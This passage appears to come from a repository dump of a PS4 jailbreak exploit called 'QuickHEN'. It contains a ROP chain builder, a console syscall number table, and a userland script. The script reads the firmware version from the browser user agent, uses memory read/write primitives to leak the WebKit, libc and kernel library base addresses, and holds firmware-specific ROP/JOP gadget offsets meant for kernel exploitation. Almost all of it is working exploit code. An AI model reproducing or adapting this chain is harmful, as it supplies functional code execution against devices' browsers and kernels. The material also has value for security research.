 93 |       this.push(gadgets["pop rdi"]);
 94 |       this.push(where);
 95 |       this.push(gadgets["pop rsi"]);
 96 |       this.push(what);
 97 |       this.push(gadgets["mov [rdi], rsi"]);
 98 |   }
 99 | 
100 |   this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
101 |   {
102 |     if (rdi != undefined) {
103 |       this.push(gadgets["pop rdi"]);
104 |       this.push(rdi);
105 |     }
106 | 
107 |     if (rsi != undefined) {
108 |       this.push(gadgets["pop rsi"]);
109 |       this.push(rsi);
110 |     }
111 | 
112 |     if (rdx != undefined) {
113 |       this.push(gadgets["pop rdx"]);
114 |       this.push(rdx);
115 |     }
116 | 
117 |     if (rcx != undefined) {
118 |       this.push(gadgets["pop rcx"]);
119 |       this.push(rcx);
120 |     }
121 | 
122 |     if (r8 != undefined) {
123 |       this.push(gadgets["pop r8"]);
124 |       this.push(r8);
125 |     }
126 |     
127 |     if (r9 != undefined) {
128 |       this.push(gadgets["pop r9"]);
129 |       this.push(r9);
130 |     }
131 | 
132 |     this.push(rip);
133 |     return this;
134 |   }
135 |   
136 |   this.run = function() {
137 |       var retv = p.loadchain(this, this.notimes);
138 |       this.clear();
139 |       return retv;
140 |   }
141 |   
142 |   return this;
143 | };


--------------------------------------------------------------------------------
/QuickHEN/syscalls.js:
--------------------------------------------------------------------------------
  1 | window.nameforsyscall = swapkeyval(window.syscallnames);
  2 | window.syscalls       = {};
  3 | 
  4 | /* Get syscall name by index */
  5 | function swapkeyval(json){
  6 |   var ret = {};
  7 |   for(var key in json){
  8 |     if (json.hasOwnProperty(key)) {
  9 |       ret[json[key]] = key;
 10 |     }
 11 |   }
 12 |   return ret;
 13 | }
 14 | 
 15 | /* A long ass map of system call names -> number, you shouldn't need to touch this */
 16 | window.syscallnames =
 17 | {
 18 |   "sys_exit": 1,
 19 |   "sys_fork": 2,
 20 |   "sys_read": 3,
 21 |   "sys_write": 4,
 22 |   "sys_open": 5,
 23 |   "sys_close": 6,
 24 |   "sys_wait4": 7,
 25 |   "sys_unlink": 10,
 26 |   "sys_chdir": 12,
 27 |   "sys_chmod": 15,
 28 |   "sys_getpid": 20,
 29 |   "sys_setuid": 23,
 30 |   "sys_getuid": 24,
 31 |   "sys_geteuid": 25,
 32 |   "sys_recvmsg": 27,
 33 |   "sys_sendmsg": 28,
 34 |   "sys_recvfrom": 29,
 35 |   "sys_accept": 30,
 36 |   "sys_getpeername": 31,
 37 |   "sys_getsockname": 32,
 38 |   "sys_access": 33,
 39 |   "sys_chflags": 34,
 40 |   "sys_fchflags": 35,
 41 |   "sys_sync": 36,
 42 |   "sys_kill": 37,
 43 |   "sys_stat": 38,
 44 |   "sys_getppid": 39,
 45 |   "sys_dup": 41,
 46 |   "sys_pipe": 42,
 47 |   "sys_getegid": 43,
 48 |   "sys_profil": 44,
 49 |   "sys_getgid": 47,
 50 |   "sys_getlogin": 49,
 51 |   "sys_setlogin": 50,
 52 |   "sys_sigaltstack": 53,
 53 |   "sys_ioctl": 54,
 54 |   "sys_reboot": 55,
 55 |   "sys_revoke": 56,
 56 |   "sys_execve": 59,
 57 |   "sys_msync": 65,
 58 |   "sys_munmap": 73,
 59 |   "sys_mprotect": 74,
 60 |   "sys_madvise": 75,
 61 |   "sys_mincore": 78,
 62 |   "sys_getgroups": 79,
 63 |   "sys_setgroups": 80,
 64 |   "sys_setitimer": 83,
 65 |   "sys_getitimer": 86,
 66 |   "sys_getdtablesize": 89,
 67 |   "sys_dup2": 90,
 68 |   "sys_fcntl": 92,
 69 |   "sys_select": 93,
 70 |   "sys_fsync": 95,
 71 |   "sys_setpriority": 96,
 72 |   "sys_socket": 97,
 73 |   "sys_connect": 98,
 74 |   "sys_getpriority": 100,
 75 |   "sys_send": 101,
 76 |   "sys_recv": 102,
 77 |   "sys_bind": 104,
 78 |   "sys_setsockopt": 105,
 79 |   "sys_listen": 106,
 80 |   "sys_recvmsg": 113,
 81 |   "sys_sendmsg": 114,
 82 |   "sys_gettimeofday": 116,
 83 |   "sys_getrusage": 117,
 84 |   "sys_getsockopt": 118,
 85 |   "sys_readv": 120,
 86 |   "sys_writev": 121,
 87 |   "sys_settimeofday": 122,
 88 |   "sys_fchmod": 124,
 89 |   "sys_recvfrom": 125,
 90 |   "sys_setreuid": 126,
 91 |   "sys_setregid": 127,
 92 |   "sys_rename": 128,
 93 |   "sys_flock": 131,
 94 |   "sys_sendto": 133,
 95 |   "sys_shutdown": 134,
 96 |   "sys_socketpair": 135,
 97 |   "sys_mkdir": 136,
 98 |   "sys_rmdir": 137,
 99 |   "sys_utimes": 138,
100 |   "sys_adjtime": 140,
101 |   "sys_getpeername": 141,
102 |   "sys_setsid": 147,
103 |   "sys_sysarch": 165,
104 |   "sys_setegid": 182,
105 |   "sys_seteuid": 183,
106 |   "sys_fstat": 189,
107 |   "sys_lstat": 190,
108 |   "sys_pathconf": 191,
109 |   "sys_fpathconf": 192,
110 |   "sys_getrlimit": 194,
111 |   "sys_setrlimit": 195,
112 |   "sys_getdirentries": 196,
113 |   "sys___sysctl": 202,
114 |   "sys_mlock": 203,
115 |   "sys_munlock": 204,
116 |   "sys_futimes": 206,
117 |   "sys_poll": 209,
118 |   "sys_clock_gettime": 232,
119 |   "sys_clock_settime": 233,
120 |   "sys_clock_getres": 234,
121 |   "sys_ktimer_create": 235,
122 |   "sys_ktimer_delete": 236,
123 |   "sys_ktimer_settime": 237,
124 |   "sys_ktimer_gettime": 238,
125 |   "sys_ktimer_getoverrun": 239,
126 |   "sys_nanosleep": 240,
127 |   "sys_rfork": 251,
128 |   "sys_issetugid": 253,
129 |   "sys_getdents": 272,
130 |   "sys_preadv": 289,
131 |   "sys_pwritev": 290,
132 |   "sys_getsid": 310,
133 |   "sys_aio_suspend": 315,
134 |   "sys_mlockall": 324,
135 |   "sys_munlockall": 325,
136 |   "sys_sched_setparam": 327,
137 |   "sys_sched_getparam": 328,
138 |   "sys_sched_setscheduler": 329,
139 |   "sys_sched_getscheduler": 330,
140 |   "sys_sched_yield": 331,
141 |   "sys_sched_get_priority_max": 332,
142 |   "sys_sched_get_priority_min": 333,
143 |   "sys_sched_rr_get_interval": 334,
144 |   "sys_utrace": 335,
145 |   "sys_sigprocmask": 340,
146 |   "sys_sigprocmask": 340,
147 |   "sys_sigsuspend": 341,
148 |   "sys_sigpending": 343,
149 |   "sys_sigtimedwait": 345,
150 |   "sys_sigwaitinfo": 346,
151 |   "sys_kqueue": 362,
152 |   "sys_kevent": 363,
153 |   "sys_uuidgen": 392,
154 |   "sys_sendfile": 393,
155 |   "sys_fstatfs": 397,
156 |   "sys_ksem_close": 400,
157 |   "sys_ksem_post": 401,
158 |   "sys_ksem_wait": 402,
159 |   "sys_ksem_trywait": 403,
160 |   "sys_ksem_init": 404,
161 |   "sys_ksem_open": 405,
162 |   "sys_ksem_unlink": 406,
163 |   "sys_ksem_getvalue": 407,
164 |   "sys_ksem_destroy": 408,
165 |   "sys_sigaction": 416,
166 |   "sys_sigreturn": 417,
167 |   "sys_getcontext": 421,
168 |   "sys_setcontext": 422,
169 |   "sys_swapcontext": 423,
170 |   "sys_sigwait": 429,
171 |   "sys_thr_create": 430,
172 |   "sys_thr_exit": 431,
173 |   "sys_thr_self": 432,
174 |   "sys_thr_kill": 433,
175 |   "sys_ksem_timedwait": 441,
176 |   "sys_thr_suspend": 442,
177 |   "sys_thr_wake": 443,
178 |   "sys_kldunloadf": 444,
179 |   "sys__umtx_op": 454,
180 |   "sys__umtx_op": 454,
181 |   "sys_thr_new": 455,
182 |   "sys_sigqueue": 456,
183 |   "sys_thr_set_name": 464,
184 |   "sys_rtprio_thread": 466,
185 |   "sys_pread": 475,
186 |   "sys_pwrite": 476,
187 |   "sys_mmap": 477,
188 |   "sys_lseek": 478,
189 |   "sys_truncate": 479,
190 |   "sys_ftruncate": 480,
191 |   "sys_thr_kill2": 481,
192 |   "sys_shm_open": 482,
193 |   "sys_shm_unlink": 483,
194 |   "sys_cpuset_getid": 486,
195 |   "sys_cpuset_getaffinity": 487,
196 |   "sys_cpuset_setaffinity": 488,
197 |   "sys_openat": 499,
198 |   "sys_pselect": 522,
199 | 
200 |   "sys_regmgr_call": 532,
201 |   "sys_jitshm_create": 533,
202 |   "sys_jitshm_alias": 534,
203 |   "sys_dl_get_list": 535,
204 |   "sys_dl_get_info": 536,
205 |   "sys_dl_notify_event": 537,
206 |   "sys_evf_create": 538,
207 |   "sys_evf_delete": 539,
208 |   "sys_evf_open": 540,
209 |   "sys_evf_close": 541,
210 |   "sys_evf_wait": 542,
211 |   "sys_evf_trywait": 543,
212 |   "sys_evf_set": 544,
213 |   "sys_evf_clear": 545,
214 |   "sys_evf_cancel": 546,
215 |   "sys_query_memory_protection": 47,
216 |   "sys_batch_map": 548,
217 |   "sys_osem_create": 549,
218 |   "sys_osem_delete": 550,
219 |   "sys_osem_open": 551,
220 |   "sys_osem_close": 552,
221 |   "sys_osem_wait": 553,
222 |   "sys_osem_trywait": 554,
223 |   "sys_osem_post": 555,
224 |   "sys_osem_cancel": 556,
225 |   "sys_namedobj_create": 557,
226 |   "sys_namedobj_delete": 558,
227 |   "sys_set_vm_container": 559,
228 |   "sys_debug_init": 560,
229 |   "sys_suspend_process": 561,
230 |   "sys_resume_process": 562,
231 |   "sys_opmc_enable": 563,
232 |   "sys_opmc_disable": 564,
233 |   "sys_opmc_set_ctl": 565,
234 |   "sys_opmc_set_ctr": 566,
235 |   "sys_opmc_get_ctr": 567,
236 |   "sys_budget_create": 568,
237 |   "sys_budget_delete": 569,
238 |   "sys_budget_get": 570,
239 |   "sys_budget_set": 571,
240 |   "sys_virtual_query": 572,
241 |   "sys_mdbg_call": 573,
242 |   "sys_sblock_create": 574,
243 |   "sys_sblock_delete": 575,
244 |   "sys_sblock_enter": 576,
245 |   "sys_sblock_exit": 577,
246 |   "sys_sblock_xenter": 578,
247 |   "sys_sblock_xexit": 579,
248 |   "sys_eport_create": 580,
249 |   "sys_eport_delete": 581,
250 |   "sys_eport_trigger": 582,
251 |   "sys_eport_open": 583,
252 |   "sys_eport_close": 584,
253 |   "sys_is_in_sandbox": 585,
254 |   "sys_dmem_container": 586,
255 |   "sys_get_authinfo": 587,
256 |   "sys_mname": 588,
257 |   "sys_dynlib_dlopen": 589,
258 |   "sys_dynlib_dlclose": 590,
259 |   "sys_dynlib_dlsym": 591,
260 |   "sys_dynlib_get_list": 592,
261 |   "sys_dynlib_get_info": 593,
262 |   "sys_dynlib_load_prx": 594,
263 |   "sys_dynlib_unload_prx": 595,
264 |   "sys_dynlib_do_copy_relocations": 596,
265 |   "sys_dynlib_prepare_dlclose": 597,
266 |   "sys_dynlib_get_proc_param": 598,
267 |   "sys_dynlib_process_needed_and_relocate": 599,
268 |   "sys_sandbox_path": 600,
269 |   "sys_mdbg_service": 601,
270 |   "sys_randomized_path": 602,
271 |   "sys_rdup": 603,
272 |   "sys_dl_get_metadata": 604,
273 |   "sys_workaround8849": 605,
274 |   "sys_is_development_mode": 606,
275 |   "sys_get_self_auth_info": 607,
276 |   "sys_dynlib_get_info_ex": 608,
277 |   "sys_budget_get_ptype": 610,
278 |   "sys_budget_getid": 609,
279 |   "sys_get_paging_stats_of_all_threads": 611,
280 |   "sys_get_proc_type_info": 612,
281 |   "sys_get_resident_count": 613,
282 |   "sys_prepare_to_suspend_process": 614,
283 |   "sys_get_resident_fmem_count": 615,
284 |   "sys_thr_get_name": 616,
285 |   "sys_set_gpo": 617,
286 |   "sys_get_paging_stats_of_all_objects": 618,
287 |   "sys_test_debug_rwmem": 619,
288 |   "sys_free_stack": 620,
289 |   "sys_suspend_system": 621,
290 |   "sys_ipmimgr_call": 622,
291 |   "sys_get_gpo": 623,
292 |   "sys_get_vm_map_timestamp": 624,
293 |   "sys_opmc_set_hw": 625,
294 |   "sys_opmc_get_hw": 626,
295 |   "sys_get_cpu_usage_all": 627,
296 |   "sys_mmap_dmem": 628,
297 |   "sys_physhm_open": 629,
298 |   "sys_physhm_unlink": 630,
299 |   "sys_resume_internal_hdd": 631,
300 |   "sys_thr_suspend_ucontext": 632,
301 |   "sys_thr_resume_ucontext": 633,
302 |   "sys_thr_get_ucontext": 634,
303 |   "sys_thr_set_ucontext": 635,
304 |   "sys_set_timezone_info": 636,
305 |   "sys_set_phys_fmem_limit": 637,
306 |   "sys_utc_to_localtime": 638,
307 |   "sys_localtime_to_utc": 639,
308 |   "sys_set_uevt": 640,
309 |   "sys_get_cpu_usage_proc": 641,
310 |   "sys_get_map_statistics": 642,
311 |   "sys_set_chicken_switches": 643,
312 |   "sys_extend_page_table_pool": 644,
313 |   "sys_645": 645,
314 |   "sys_get_kernel_mem_statistics": 646,
315 |   "sys_get_sdk_compiled_version": 647,
316 |   "sys_app_state_change": 648,
317 |   "sys_dynlib_get_obj_member": 649,
318 |   "sys_budget_get_ptype_of_budget": 650,
319 |   "sys_prepare_to_resume_process": 651,
320 |   "sys_process_terminate": 652,
321 |   "sys_blockpool_open": 653,
322 |   "sys_blockpool_map": 654,
323 |   "sys_blockpool_unmap": 655,
324 |   "sys_dynlib_get_info_for_libdbg": 656,
325 |   "sys_blockpool_batch": 657,
326 |   "sys_fdatasync": 658,
327 |   "sys_dynlib_get_list2": 659,
328 |   "sys_dynlib_get_info2": 660,
329 |   "sys_aio_submit": 661,
330 |   "sys_aio_multi_delete": 662,
331 |   "sys_aio_multi_wait": 663,
332 |   "sys_aio_multi_poll": 664,
333 |   "sys_aio_get_data": 655,
334 |   "sys_aio_multi_cancel": 666,
335 |   "sys_get_bio_usage_all": 667,
336 |   "sys_aio_create": 668,
337 |   "sys_aio_submit_cmd": 669,
338 |   "sys_aio_init": 670,
339 |   "sys_get_page_table_stats": 671,
340 |   "sys_dynlib_get_list_for_libdbg": 672
341 | }
342 | 


--------------------------------------------------------------------------------
/QuickHEN/unblocker.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/unblocker.bin


--------------------------------------------------------------------------------
/QuickHEN/userland.js:
--------------------------------------------------------------------------------
  1 | var p;
  2 | 
  3 | function sleep(milliseconds) {
  4 | 	var start = new Date().getTime();
  5 | 	for (var i = 0; i < 1e7; i++) {
  6 | 		if ((new Date().getTime() - start) > milliseconds)
  7 | 			break;
  8 | 	}
  9 | }
 10 | 
 11 | var print = function (x) {
 12 | 	document.getElementById("console").innerText += x + "\n";
 13 | }
 14 | var print = function (string) { // like print but html
 15 | 	document.getElementById("console").innerHTML += string + "\n";
 16 | }
 17 | 
 18 | var get_jmptgt = function (addr) {
 19 | 	var z = p.read4(addr) & 0xFFFF;
 20 | 	var y = p.read4(addr.add32(2));
 21 | 	if (z != 0x25ff) return 0;
 22 | 
 23 | 	return addr.add32(y + 6);
 24 | }
 25 | 
 26 | var gadgetmap_wk = {
 27 | 	"ep": [0x5b, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0x5d, 0xc3],
 28 | 	"pop rsi": [0x5e, 0xc3],
 29 | 	"pop rdi": [0x5f, 0xc3],
 30 | 	"pop rsp": [0x5c, 0xc3],
 31 | 	"pop rax": [0x58, 0xc3],
 32 | 	"pop rdx": [0x5a, 0xc3],
 33 | 	"pop rcx": [0x59, 0xc3],
 34 | 	"pop rsp": [0x5c, 0xc3],
 35 | 	"pop rbp": [0x5d, 0xc3],
 36 | 	"pop r8": [0x47, 0x58, 0xc3],
 37 | 	"pop r9": [0x47, 0x59, 0xc3],
 38 | 	"infloop": [0xeb, 0xfe, 0xc3],
 39 | 	"ret": [0xc3],
 40 | 	"mov [rdi], rsi": [0x48, 0x89, 0x37, 0xc3],
 41 | 	"mov [rax], rsi": [0x48, 0x89, 0x30, 0xc3],
 42 | 	"mov [rdi], rax": [0x48, 0x89, 0x07, 0xc3],
 43 | 	"mov rax, rdi": [0x48, 0x89, 0xf8, 0xc3]
 44 | };
 45 | 
 46 | var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0];
 47 | slowpath_jop.reverse();
 48 | 
 49 | var gadgets;
 50 | 
 51 | window.stage2 = function () {
 52 | 	try {
 53 | 		window.stage2_();
 54 | 	} catch (e) {
 55 | 		print(e);
 56 | 	}
 57 | }
 58 | 
 59 | /* Get user agent for determining system firmware */
 60 | var fwFromUA = navigator.userAgent.substring(navigator.userAgent.indexOf("5.0 (") + 19, navigator.userAgent.indexOf(") Apple"));
 61 | if (fwFromUA == "5.07") alert(fwFromUA + " is not supported yet");
 62 | 
 63 | if (fwFromUA == "5.01") {
 64 | 	gadgetcache = {
 65 | 		"ret":                    0x0000003C, // 4.55-5.05
 66 | 		"jmp rax":                0x00000082, // 4.55-5.05
 67 | 		"ep":                     0x000000AD, // 4.55-5.05
 68 | 		"pop rbp":                0x000000B6, // 4.55-5.05
 69 | 		"mov [rdi], rax":         0x0014536B, // 5.01
 70 | 		"pop r8":                 0x000179C5, // 5.01-5.05
 71 | 		"pop rax":                0x000043F5, // 5.01-5.05
 72 | 		"mov rax, rdi":           0x000058D0, // 5.01-5.05
 73 | 		"mov rax, [rax]":         0x0006C83A, // 5.01-5.05
 74 | 		"pop rsi":                0x0008F38A, // 5.01-5.05
 75 | 		"pop rdi":                0x00038DBA, // 5.01-5.05
 76 | 		"pop rcx":                0x00052E59, // 5.01-5.05
 77 | 		"pop rsp":                0x0001E687, // 5.01-5.05
 78 | 		"mov [rdi], rsi":         0x00023AC2, // 5.01-5.05
 79 | 		"mov [rax], rsi":         0x002565A7, // 5.01
 80 | 		"pop rdx":                0x000DEDC2, // 5.01
 81 | 		"pop r9":                 0x00BB30CF, // 5.01
 82 | 		"jop":                    0x000C37D0, // 5.01-5.05
 83 | 		"infloop":                0x0151EFCA, // 5.01
 84 | 
 85 | 		"add rax, rcx":           0x000156DB, // 5.01-5.05
 86 | 		"mov rdx, rax":           0x00353A71, // 5.01
 87 | 		"mov rdi, rax":           0x015A3FAF, // 5.01
 88 | 		"mov rax, rdx":           0x001CEE60, // 5.01
 89 | 
 90 | 		// 5.01 JOP Gadgets
 91 | 		"jop1":                   0x012A184D, // 5.01
 92 | 		"jop2":                   0x006EF2E5, // 5.01
 93 | 		"jop3":                   0x015CA29B, // 5.01
 94 | 		"jop4":                   0x012846B4, // 5.01
 95 | 		"jop_mov rbp, rsp":       0x000F094A, // 5.01-5.05
 96 | 		"jop6":                   0x002728A1, // 5.01
 97 | 		
 98 | 		// kROP Chain stuff
 99 | 		"ret2userland":           0x0005CDB9, // 5.01-5.05
100 | 		
101 | 		// Used for kernel exploit stuff
102 | 		"mov rax, [rdi]":         0x00046EF9, // 5.01-5.05
103 | 		"add rdi, rax":           0x0055566F, // 5.01
104 | 		"add rax, rsi":           0x001520C6, // 5.01-5.05
105 | 		"and rax, rsi":           0x01570A1F, // 5.01
106 | 		"jmp rdi":                0x00295DBE, // 5.01
107 | 		
108 | 		"longjmp":                0x000014E8, // 5.01-5.05
109 | 		"createThread":           0x00779190, // 5.01
110 | 	};
111 | 	gadgetshiftcache = {
112 | 		"stackshift_jop1":        0x00000058, // 5.01-5.05
113 | 		"stackshift_jop6":        0x00000028, // 4.55-5.05
114 | 	};
115 | } else if (fwFromUA == "5.05") {
116 | 	gadgetcache = {
117 | 		"ret":                    0x0000003C, // 4.55-5.05
118 | 		"jmp rax":                0x00000082, // 4.55-5.05
119 | 		"ep":                     0x000000AD, // 4.55-5.05
120 | 		"pop rbp":                0x000000B6, // 4.55-5.05
121 | 		"mov [rdi], rax":         0x003ADAEB, // 5.05
122 | 		"pop r8":                 0x000179C5, // 5.01-5.05
123 | 		"pop rax":                0x000043F5, // 5.01-5.05
124 | 		"mov rax, rdi":           0x000058D0, // 5.01-5.05
125 | 		"mov rax, [rax]":         0x0006C83A, // 5.01-5.05
126 | 		"pop rsi":                0x0008F38A, // 5.01-5.05
127 | 		"pop rdi":                0x00038DBA, // 5.01-5.05
128 | 		"pop rcx":                0x00052E59, // 5.01-5.05
129 | 		"pop rsp":                0x0001E687, // 5.01-5.05
130 | 		"mov [rdi], rsi":         0x00023AC2, // 5.01-5.05
131 | 		"mov [rax], rsi":         0x00256667, // 5.05
132 | 		"pop rdx":                0x001BE024, // 5.05
133 | 		"pop r9":                 0x00BB320F, // 5.05
134 | 		"jop":                    0x000C37D0, // 5.01-5.05
135 | 		"infloop":                0x01545EAA, // 5.05
136 | 
137 | 		"add rax, rcx":           0x000156DB, // 5.01-5.05
138 | 		"mov rdx, rax":           0x00353B31, // 5.05
139 | 		"mov rdi, rax":           0x015A412F, // 5.05
140 | 		"mov rax, rdx":           0x001CEF20, // 5.05
141 | 
142 | 		// kROP Chain Stuff
143 | 		"ret2userland":           0x0005CDB9, // 5.01-5.05
144 | 		
145 | 		// 5.05 JOP Gadgets
146 | 		"jop1":                   0x012A19CD, // 5.05
147 | 		"jop2":                   0x006EF4E5, // 5.05
148 | 		"jop3":                   0x015CA41B, // 5.05
149 | 		"jop4":                   0x01284834, // 5.05
150 | 		"jop_mov rbp, rsp":       0x000F094A, // 5.01-5.05
151 | 		"jop6":                   0x00272961, // 5.05
152 | 		
153 | 		// Used for kernel exploit stuff
154 | 		"mov rax, [rdi]":         0x00046EF9, // 5.01-5.05
155 | 		"add rdi, rax":           0x005557DF, // 5.05
156 | 		"add rax, rsi":           0x001520C6, // 5.01-5.05
157 | 		"and rax, rsi":           0x01570B9F, // 5.05
158 | 		"jmp rdi":                0x00295E7E, // 5.05
159 | 		
160 | 		"mov [rsi], rdx":         0x00A6450A, // 5.05
161 | 		
162 | 		"longjmp":                0x000014E8, // 5.01-5.05
163 | 		"createThread":           0x00779390, // 5.05
164 | 	};
165 | 	gadgetshiftcache = {
166 | 		"stackshift_jop1":        0x00000058, // 5.01-5.05
167 | 		"stackshift_jop6":        0x00000028, // 4.55-5.05
168 | 	};
169 | } else if (fwFromUA == "4.55" || fwFromUA == "4.74") {
170 | 	gadgetcache = {
171 | 		// Regular ROP Gadgets
172 | 		"ret":                    0x0000003C, // 4.55-5.05
173 | 		"jmp rax":                0x00000082, // 4.55-5.05
174 | 		"ep":                     0x000000AD, // 4.55-5.05
175 | 		"pop rbp":                0x000000B6, // 4.55-5.05
176 | 		"mov [rdi], rax":         0x00003FBA, // 4.55-4.74
177 | 		"pop r8":                 0x0000CC42, // 4.55-4.74
178 | 		"pop rax":                0x0000CC43, // 4.55-4.74
179 | 		"mov rax, rdi":           0x0000E84E, // 4.55-4.74
180 | 		"mov rax, [rax]":         0x000130A3, // 4.55-4.74
181 | 		"pop rsi":                0x0007B1EE, // 4.55-4.74
182 | 		"pop rdi":                0x0007B23D, // 4.55-4.74
183 | 		"pop rcx":                0x00271DE3, // 4.55-4.74
184 | 		"pop rsp":                0x0027A450, // 4.55-4.74
185 | 		"mov [rdi], rsi":         0x0039CF70, // 4.55-4.74
186 | 		"mov [rax], rsi":         0x003D0877, // 4.55-4.74
187 | 		"pop rdx":                0x00565838, // 4.55-4.74
188 | 		"pop r9":                 0x0078BA1F, // 4.55-4.74
189 | 		"jop":                    0x01277350, // 4.55-4.74
190 | 		"infloop":                0x012C4009, // 4.55-4.74
191 | 
192 | 		"add rax, rcx":           0x0084D04D, // 4.55-4.74
193 | 		"mov rdx, rax":           0x00012A16, // 4.55-4.74
194 | 		//"mov rdi, rax":           0xDEADBEEF, // 4.55-4.74
195 | 		"mov rax, rdx":           0x001E4EDE, // 4.55-4.74
196 | 
197 | 		// Used for kernel exploit stuff
198 | 		"mov rax, [rdi]":         0x0013A220, // 4.55-4.74
199 | 		"add rdi, rax":           0x0141D1CD, // 4.55-4.74
200 | 		"add rax, rsi":           0x00C71EC4, // 4.55-4.74
201 | 		//"and rax, rsi":           0xDEADBEEF, // 4.55-4.74
202 | 		"jmp rdi":                0x00182715, // 4.55-4.74
203 | 
204 | 		// kROP Chain Stuff
205 | 		"ret2userland":           0x0008905C, // 4.55-4.74
206 | 		"add [r9], rbp":          0x01320CB1, // 4.55-4.74
207 | 		"mov rsp, rdx":           0x00F3DED0, // 4.55-4.74
208 | 		"test":                   0x000028A2, // 4.55-4.74
209 | 		"sub rax, rcx":           0x00E9478B, // 4.55-4.74
210 | 		
211 | 		// special 4.55-4.74
212 | 		"add rsi, [rdi]; mov rax, rsi":   0x0119D1F0, // 4.55-4.74
213 | 		"jmp rdx_more":           0x001517C7, // 4.55-4.74
214 | 		
215 | 		// JOP Gadgets
216 | 		"jop1":                   0x005D365D, // 4.55-4.74
217 | 		"jop2":                   0x007B0E65, // 4.55-4.74
218 | 		"jop3":                   0x0142BDBB, // 4.55-4.74
219 | 		"jop4":                   0x00637AC4, // 4.55-4.74
220 | 		"jop_mov rbp, rsp":       0x001B5B7A, // 4.55-4.74
221 | 		"jop6":                   0x000F391D, // 4.55-4.74
222 | 
223 | 		// New kROP Gadgets
224 | 		"mov [rsi], rdx":         0x01574006, // 4.55-4.74
225 | 
226 | 		// Functions
227 | 		"longjmp":                0x00001458, // 4.55-4.74
228 | 		"createThread":           0x0116ED40, // 4.55-4.74
229 | 	};
230 | 	gadgetshiftcache = {
231 | 		"stackshift_jop1":        0x00000048, // 4.55-4.74
232 | 		"stackshift_jop6":        0x00000028, // 4.55-5.05
233 | 	};
234 | }
235 | 
236 | window.gadgets_shift = gadgetshiftcache;
237 | 
238 | window.stage2_ = function () {
239 | 	p = window.prim;
240 | 
241 | 	p.leakfunc = function (func) {
242 | 		var fptr_store = p.leakval(func);
243 | 		return (p.read8(fptr_store.add32(0x18))).add32(0x40);
244 | 	}
245 | 
246 | 	var parseFloatStore = p.leakfunc(parseFloat);
247 | 	var parseFloatPtr = p.read8(parseFloatStore);
248 | 	//alert(parseFloatPtr);
249 | 	
250 | 	// Resolve libSceWebKit2 base using parseFloat offset
251 | 	var webKitBase = parseFloatPtr;
252 | 	if (fwFromUA == "5.00" || fwFromUA == "5.01" || fwFromUA == "5.03" || fwFromUA == "5.05" || fwFromUA == "5.07") {
253 | 		webKitBase.sub32inplace(0x578540);
254 | 	} else if (fwFromUA == "4.55" || fwFromUA == "4.74") {
255 | 		webKitBase.sub32inplace(0xE8DDA0);
256 | 	} else alert("unknown parseFloat offset. parseFloatPtr: " + parseFloatPtr);
257 | 	window.webKitBase = webKitBase;
258 | 	
259 | 	var o2wk = function (o) {
260 | 		return webKitBase.add32(o);
261 | 	}
262 | 	window.o2wk = o2wk;
263 | 
264 | 	if (fwFromUA == "4.55" || fwFromUA == "4.74") {
265 | 		gadgets = {
266 | 			"__stack_chk_fail": o2wk(0xC8),
267 | 			"__stack_chk_fail_offset": 0xD190,
268 | 			"memcmp": o2wk(0x228),
269 | 			"memcmp_offset": 0x71C60,
270 | 			"memset": o2wk(0x248),
271 | 			"memset_offset": 0x2AE10,
272 | 			"setjmp": o2wk(0x1468)
273 | 		};
274 | 	} else if (fwFromUA == "5.00" || fwFromUA == "5.01" || fwFromUA == "5.03" || fwFromUA == "5.05" || fwFromUA == "5.07") {
275 | 		gadgets = {
276 | 			"__stack_chk_fail": o2wk(0xC8),
277 | 			"__stack_chk_fail_offset": 0x11EC0,
278 | 			"memcmp": o2wk(0x208),
279 | 			"memcmp_offset": 0x8AFA0,
280 | 			"memset": o2wk(0x228),
281 | 			"memset_offset": 0x118,
282 | 			"setjmp": o2wk(0x14F8)
283 | 		};
284 | 	}
285 | 
286 | 	var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets.memset));
287 | 	libSceLibcInternalBase.sub32inplace(gadgets.memset_offset);
288 | 	window.libSceLibcInternalBase = libSceLibcInternalBase;
289 | 	//alert(libSceLibcInternalBase);
290 | 	var o2lc = function (o) {
291 | 		return libSceLibcInternalBase.add32(o);
292 | 	}
293 | 	window.o2lc = o2lc;
294 | 	
295 | 	var libKernelBase = p.read8(get_jmptgt(gadgets.__stack_chk_fail));
296 | 	libKernelBase.sub32inplace(gadgets.__stack_chk_fail_offset);
297 | 	window.libKernelBase = libKernelBase;
298 | 	//alert(window.libKernelBase);
299 | 	var o2lk = function (o) {
300 | 		return libKernelBase.add32(o);
301 | 	}
302 | 	window.o2lk = o2lk;
303 | 	
304 | 	var wkview = new Uint8Array(0x1000);
305 | 	var wkstr = p.leakval(wkview).add32(0x10);
306 | 	var orig_wkview_buf = p.read8(wkstr);
307 | 
308 | 	p.write8(wkstr, webKitBase);
309 | 	//p.write4(wkstr.add32(8), 0x367c000);
310 | 	p.write4(wkstr.add32(8), 0x3052D38);
311 | 
312 | 	var gadgets_to_find = 0;
313 | 	var gadgetnames = [];
314 | 	for (var gadgetname in gadgetmap_wk) {
315 | 		if (gadgetmap_wk.hasOwnProperty(gadgetname)) {
316 | 			gadgets_to_find++;
317 | 			gadgetnames.push(gadgetname);
318 | 			gadgetmap_wk[gadgetname].reverse();
319 | 		}
320 | 	}
321 | 
322 | 	gadgets_to_find++;
323 | 
324 | 	var findgadget = function (donecb) {
325 | 		if (gadgetcache) {
326 | 			gadgets_to_find = 0;
327 | 			slowpath_jop = 0;
328 | 
329 | 			for (var gadgetname in gadgetcache) {
330 | 				if (gadgetcache.hasOwnProperty(gadgetname))
331 | 					gadgets[gadgetname] = o2wk(gadgetcache[gadgetname]);
332 | 			}
333 | 		} else {
334 | 			for (var i = 0; i < wkview.length; i++) {
335 | 				if (wkview[i] == 0xc3) {
336 | 					for (var nl = 0; nl < gadgetnames.length; nl++) {
337 | 						var found = 1;
338 | 						if (!gadgetnames[nl])
339 | 							continue;
340 | 						var gadgetbytes = gadgetmap_wk[gadgetnames[nl]];
341 | 						for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) {
